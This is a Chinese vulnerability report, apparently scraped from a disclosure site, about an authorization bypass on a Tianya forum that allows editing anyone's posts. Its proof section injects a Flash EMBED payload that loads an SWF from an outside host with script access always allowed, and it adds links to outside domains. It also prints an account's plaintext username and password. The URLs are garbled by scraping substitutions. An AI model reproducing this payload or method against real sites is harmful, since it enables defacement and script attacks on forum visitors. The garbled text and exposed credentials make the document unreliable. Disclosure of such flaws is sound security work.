简要描述: 天涯某版块存在越权漏洞,可进行修改任何热门帖子内容,并且在其中植入恶意代码 详细说明:
漏洞证明: 另外博客进行SWF的跳转: http://myjink.blog.tianya.cn
swf代码如下: <EMBED pluginspage=http://flash.macromedia测试数据/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash src=http://HdhCmsTest96169.cc/96169.swf width=111 height=115 type=application/x-shockwave-flash quality="high" allowfullscreen="false" alloWNetWOrking="All" allowscRIPtaccESs="aLWays" wmode="transparent"></EMBED>
天涯问吧ID:用户名:myjink520 密码:2885177
来吧创建ID:458089&articleId (注:必须创建来吧 并激活才可以进行越权)自行创建的来吧没有激活的话是不可操作的! http://groups.tianya.cn/tribe/showArticle.jsp?groupId=458089&articleId=a5c9626ec2465d29b9c27c1806f2c5fc&fm=0 修改后的的帖子: 帖子能够还可以进行SWF的代码进行跳转:
swf代码如下: <EMBED pluginspage=http://flash.macromedia测试数据/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash src=http://HdhCmsTest96169.cc/96169.swf width=111 height=115 type=application/x-shockwave-flash quality="high" allowfullscreen="false" alloWNetWOrking="All" allowscRIPtaccESs="aLWays" wmode="transparent"></EMBED>
链接! <A href=" http://HdhCmsTest1.lkdcc测试数据 " rel=nofollow target=_blank>http://HdhCmsTest1.lkdcc测试数据</A> <A href=" http://HdhCmsTest9.10010c测试数据 " rel=nofollow target=_blank>http://HdhCmsTest9.10010c测试数据</A> <A href=" http://HdhCmsTestb392.js.55588.mobi " rel=nofollow target=_blank>http://HdhCmsTestb392.js.55588.mobi</A> <A href=" http://HdhCmsTestc0ee.mo.qiasoft.net/ " rel=nofollow target=_blank>http://HdhCmsTestlkdcc测试数据</A>
修复方案: 呵呵 验证权限 过滤代码
查看更多关于天涯绕过权限任意编辑他人帖子漏洞及植入恶意的详细内容...